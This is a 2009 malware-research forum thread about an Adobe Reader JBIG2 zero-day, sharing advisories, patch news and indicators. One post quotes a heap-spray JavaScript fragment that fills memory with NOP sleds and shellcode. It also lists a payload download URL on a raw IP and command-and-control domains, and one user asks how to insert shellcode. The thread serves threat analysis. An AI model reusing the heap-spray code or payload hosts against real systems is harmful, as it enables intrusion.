Malware Domain List

Malware Related => Tools of the trade / Internet News => Topic started by: SysAdMini on February 20, 2009, 07:06:26 am

Title: Adobe/Acrobat 0-day
Post by: SysAdMini on February 20, 2009, 07:06:26 am

http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20090219

Title: Re: Adobe/Acrobat 0-day
Post by: Serg on February 20, 2009, 12:14:55 pm

hxxp://dump.vicp.cc/l/a.bin - url from the same 0day i suppose...

Title: Re: Adobe/Acrobat 0-day
Post by: Serg on February 20, 2009, 01:37:22 pm

cnc on religion.xicp.net and religion.8866.org? Japan? WTF ???

Title: Re: Adobe/Acrobat 0-day
Post by: SysAdMini on February 21, 2009, 05:21:58 am

http://vrt-sourcefire.blogspot.com/2009/02/have-nice-weekend-pdf-love.html

Title: Re: Adobe/Acrobat 0-day
Post by: SysAdMini on February 22, 2009, 06:28:20 pm

Homebrew patch for Adobe AcroReader 9
http://vrt-sourcefire.blogspot.com/2009/02/homebrew-patch-for-adobe-acroreader-9.html

Title: Re: Adobe/Acrobat 0-day
Post by: DiFor on February 22, 2009, 06:38:44 pm

and saw somebody working version of this? very interesting to see

Title: Re: Adobe/Acrobat 0-day
Post by: SysAdMini on February 24, 2009, 06:55:40 am

Targeted PDFs Used as Exploits
https://forums.symantec.com/t5/blogs/blogarticlepage/blog-id/vulnerabilities_exploits/article-id/188

Title: Re: Adobe/Acrobat 0-day
Post by: WIEx on February 24, 2009, 07:22:16 am

milw0rm POC-s:
http://milw0rm.com/exploits/8090
http://milw0rm.com/exploits/8099

I think that soon will attack as well as POC in public

Title: Re: Adobe/Acrobat 0-day
Post by: alta on February 24, 2009, 09:04:55 am

Thanks WIEx for the lynks  ;)

Title: Re: Adobe/Acrobat 0-day
Post by: DiFor on February 24, 2009, 12:20:03 pm

it's DoS exploit

Title: Re: Adobe/Acrobat 0-day
Post by: Serg on February 24, 2009, 01:27:53 pm

but it works under 9 ;)

Title: Re: Adobe/Acrobat 0-day
Post by: DiFor on February 24, 2009, 02:17:51 pm

it's only crash apllication)

Title: Re: Adobe/Acrobat 0-day
Post by: Serg on February 24, 2009, 02:27:39 pm

the new payload for me... pdf md5: 8AE719CDD29F0E6AF4D4DD321CC40355

Code: [Select]

...
                while (pointers.length<=0x100000/2)pointers+=pointers
                pointers=pointers.substring(0,0x100000/2-32/2-4/2-pointers1.length-2/2
                while (nop.length<=0x100000/2)nop+=nop
                nop=nop.substring(0,0x100000/2-32/2-4/2-jmp.length-2/2)
                var x=new Array()
                for (i=0 ; i<150 ; i++)
                {
                        x[i]=nop+shellcode
                }
                for ( ; i<201 ; i++)
                {
                        x[i]=pointers+pointers1
                }
                return x
...
(http://img10.imageshack.us/img10/5553/pdfjs.jpg)
load from

Code: [Select]

http://202.67.215.110/caonimabi.exe(http://www.robtex.com/dot/202.67.215.110,202.67.215.0/24,AS4645,olympic-2012.org,uyghurameircan.com,winupdate.crackcode.net!1AS2,0NET1,3A0,4A0,5A0!2.png)
IP is very know from several malware, ex: http://www.threatexpert.com/report.aspx?md5=39376f28624e3de9e23d6fd57235b42e (http://www.threatexpert.com/report.aspx?md5=39376f28624e3de9e23d6fd57235b42e)

Title: Re: Adobe/Acrobat 0-day
Post by: Serg on February 24, 2009, 02:30:00 pm

Quote from: DiFor on February 24, 2009, 02:17:51 pm

it's only crash apllication)

u do not know the secret   :D

Title: Re: Adobe/Acrobat 0-day
Post by: WIEx on February 24, 2009, 02:33:00 pm

Quote

it's only crash apllication)

Yes, I said that this POC (proof of concept) exploit

Title: Re: Adobe/Acrobat 0-day
Post by: WIEx on February 24, 2009, 02:38:17 pm

Serg, thx, good work:)

Title: Re: Adobe/Acrobat 0-day
Post by: Serg on February 24, 2009, 04:17:48 pm

Quote from: WIEx on February 24, 2009, 02:38:17 pm

Serg, thx, good work:)

Ur welcome)
WIEx r u from opensc.ws?  :-\ and r ur icq 274734*?

Title: Re: Adobe/Acrobat 0-day
Post by: WIEx on February 24, 2009, 04:56:05 pm

Quote

WIEx r u from opensc.ws?

No, Only as a spectator)

Quote

and r ur icq 274734*?

no:)

Title: Re: Adobe/Acrobat 0-day
Post by: SysAdMini on February 25, 2009, 07:04:27 am

Adobe Acrobat pdf 0-day exploit, No JavaScript needed
https://isc.sans.org/diary.html?storyid=5926

http://secunia.com/blog/44/

Title: Re: Adobe/Acrobat 0-day
Post by: Serg on February 25, 2009, 08:03:34 am

tested on malware
(http://img301.imageshack.us/img301/1882/pdfexpl.jpg)
payload doesn't start but reader crached => exp works, no js needed... shit...

Title: Re: Adobe/Acrobat 0-day
Post by: Serg on February 25, 2009, 10:14:38 am

Adobe Reader and Acrobat Issue update
http://blogs.adobe.com/psirt/ (http://blogs.adobe.com/psirt/)

Quote

Adobe is also planning to make updates available for Adobe Reader 7 and 8, and Acrobat 7 and 8, by March 18th. :o

Quote

1. Launch Acrobat or Adobe Reader.
2. Select Edit>Preferences
3. Select the JavaScript Category
4. Uncheck the ‘Enable Acrobat JavaScript’ option :o
5. Click OK

I hate adobe. 1 month without solution... >:(

Title: Re: Adobe/Acrobat 0-day
Post by: WIEx on February 25, 2009, 01:38:10 pm

upload this file here

Title: Re: Adobe/Acrobat 0-day
Post by: dash_neghab on February 26, 2009, 01:42:40 pm

Could we have this file for analysis also? At least entire javascript code....

Title: Re: Adobe/Acrobat 0-day
Post by: Serg on February 26, 2009, 02:46:46 pm

Quote from: dash_neghab on February 26, 2009, 01:42:40 pm

Could we have this file for analysis also? At least entire javascript code....

No :-*

Title: Re: Adobe/Acrobat 0-day
Post by: SysAdMini on March 04, 2009, 06:36:12 pm

Didier Stevens decribes a howto get infected from this pdf vulnerability WITHOUT opening the pdf file !!!!

Quickpost: /JBIG2Decode Trigger Trio
http://blog.didierstevens.com/2009/03/04/quickpost-jbig2decode-trigger-trio/

Title: Re: Adobe/Acrobat 0-day
Post by: kenrry on March 09, 2009, 02:59:51 am

Quote from: Serg on February 26, 2009, 02:46:46 pm

Quote from: dash_neghab on February 26, 2009, 01:42:40 pm

Could we have this file for analysis also? At least entire javascript code....

No :-*

maybe,the javascript code its not important ,javascript only make a heap spray with a address,but  from the info on the net, cant find the exploit address,so the head of jbig2decode stream i think is very important
also ,in windows,if the mouse jump to the PDF file ,the acroRD32info.exe will open it without using reader,
add me with icq 94507815 and get more info

Title: Re: Adobe/Acrobat 0-day
Post by: dash_neghab on March 13, 2009, 07:58:36 am

Thanks for PoC :-)  :-*

Title: Re: Adobe/Acrobat 0-day
Post by: DiFor on March 13, 2009, 03:25:52 pm

tell me plz, how can I insert it in a way exploit JS source, or Shellcode (execute for example)?

Title: Re: Adobe/Acrobat 0-day
Post by: dash_neghab on March 14, 2009, 07:01:38 am

Ask Serg about it

Title: Re: Adobe/Acrobat 0-day
Post by: sowhat-x on March 14, 2009, 02:47:24 pm

He-he,I really hate "replying in place" of others,but well...I think Serg already gave his answer regarding this issue...  ::)

Title: Re: Adobe/Acrobat 0-day
Post by: Serg on March 15, 2009, 02:30:18 pm

Quote from: sowhat-x on March 14, 2009, 02:47:24 pm

He-he,I really hate "replying in place" of others,but well...I think Serg already gave his answer regarding this issue...  ::)

Thank u  sowhat-x! :) I  can't reply "NO" to all sriptkiddies around the world...

Title: Re: Adobe/Acrobat 0-day
Post by: SysAdMini on March 25, 2009, 09:43:06 am

Adobe Reader and Acrobat JBIG2 Encoded Stream Heap Overflow Vulnerability
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=776

Title: Re: Adobe/Acrobat 0-day
Post by: Toaster on March 27, 2009, 09:15:16 pm

btw I forgot..
my Analysis of the PDF Exploit

http://web17.webbpro.de/index.php?page=analysing-the-pdf-exploit